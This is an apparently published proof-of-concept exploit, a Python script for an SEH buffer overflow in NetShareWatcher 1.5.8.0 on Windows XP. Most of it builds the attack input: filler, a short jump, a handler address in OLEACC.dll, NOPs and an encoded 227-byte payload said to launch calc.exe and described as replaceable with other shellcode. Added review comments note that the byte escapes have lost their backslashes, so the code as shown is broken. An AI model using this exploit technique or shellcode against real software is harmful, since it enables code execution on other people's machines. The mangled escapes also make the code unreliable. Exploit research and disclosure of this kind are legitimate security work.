# Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow
# Date: 2019-03-19
# Vendor Homepage: http://netsharewatcher.nsauditor.com
# Software Link: http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
# Exploit Author: Peyman Forouzan
# Tested Version: 1.5.8.0
# Tested on: Windows XP SP2 - SP3

# 1- Run python code : NetShareWatcher.py
# 2- Open Exploit.txt and copy content to clipboard
# 3- Open NetShareWatcher
# 4- Setting --> Defaults --> Restrictions --> Add --> Custom
# 5- Paste the content of Exploit.txt into the box
# 6- Click 'Find'
# 7- Calc.exe Open ( Can be replaced with Shellcode )

#!/usr/bin/python

# Input layout for the SEH overwrite named in the title, in the order it is
# concatenated further down: filler, Next-SEH field, SEH handler field, NOPs.
# NOTE(review): every "x.." sequence on this page appears without a leading
# backslash, so Python reads each one as literal characters rather than as a
# single byte; "x41" * 262 is a 786-character string, not 262 bytes.
# Presumably the backslashes were lost when the page was extracted.
# Defender note: overwriting a handler pointer with a fixed address inside a
# system DLL relies on that module loading at a predictable address and on
# the process not validating handler pointers (SafeSEH / SEHOP). The header
# lists Windows XP SP2 - SP3 as the only tested platforms.
# NOTE(review): the name `buffer` shadows the Python 2 builtin of that name.
buffer = "x41" * 262  # filler; presumably the distance to the SEH record on the tested build - not verifiable from this page
nseh = "xebx14x90x90" # Overwrite Next Seh With Short jmp
seh = "x90xBFxC9x74" # Overwrite Seh / pop esi pop ebx retn [OLEACC.dll]
nops = "x90" * 20  # padding placed between the handler field and the payload

# Calc.exe payload [size 227]
# NOTE(review): opaque encoded bytes; according to the author's label they
# start calc.exe as a visible proof of code execution. The content was not
# decoded or verified in this review. The chunks below hold 16 x 14 + 3 = 227
# two-digit hex values, which matches the stated size.
# The trailing ';' on the last line is a no-op in Python.
buf =""
buf += "xdbxcfxb8x27x17x16x1fxd9x74x24xf4x5fx2bxc9"
buf += "xb1x33x31x47x17x83xefxfcx03x60x04xf4xeax92"
buf += "xc2x71x14x6ax13xe2x9cx8fx22x30xfaxc4x17x84"
buf += "x88x88x9bx6fxdcx38x2fx1dxc9x4fx98xa8x2fx7e"
buf += "x19x1dxf0x2cxd9x3fx8cx2ex0exe0xadxe1x43xe1"
buf += "xeax1fxabxb3xa3x54x1ex24xc7x28xa3x45x07x27"
buf += "x9bx3dx22xf7x68xf4x2dx27xc0x83x66xdfx6axcb"
buf += "x56xdexbfx0fxaaxa9xb4xe4x58x28x1dx35xa0x1b"
buf += "x61x9ax9fx94x6cxe2xd8x12x8fx91x12x61x32xa2"
buf += "xe0x18xe8x27xf5xbax7bx9fxddx3bxafx46x95x37"
buf += "x04x0cxf1x5bx9bxc1x89x67x10xe4x5dxeex62xc3"
buf += "x79xabx31x6axdbx11x97x93x3bxfdx48x36x37xef"
buf += "x9dx40x1ax65x63xc0x20xc0x63xdax2ax62x0cxeb"
buf += "xa1xedx4bxf4x63x4axa3xbex2exfax2cx67xbbxbf"
buf += "x30x98x11x83x4cx1bx90x7bxabx03xd1x7exf7x83"
buf += "x09xf2x68x66x2exa1x89xa3x4dx24x1ax2fxbcxc3"
buf += "x9axcaxc0";

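# Concatenate the pieces in the order the layout needs:
# filler, Next-SEH field, SEH handler field, NOP padding, payload.
payload = buffer + nseh + seh + nops + buf

# Write the string to Exploit.txt in the current working directory.
# NOTE(review): with the string literals as they appear on this page (no
# backslash escapes) the file holds plain text such as "x41x41..." and the
# reported length counts characters, not bytes.
try:
    # The context manager closes the handle even if write() raises, which the
    # original open()/close() pair did not guarantee.
    with open("Exploit.txt", "w") as f:
        print("[+] Creating %s bytes payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except IOError:
    # Only file-system failures are reported here; the original bare `except`
    # also hid unrelated errors such as a misspelled variable name.
    print("File can't be created")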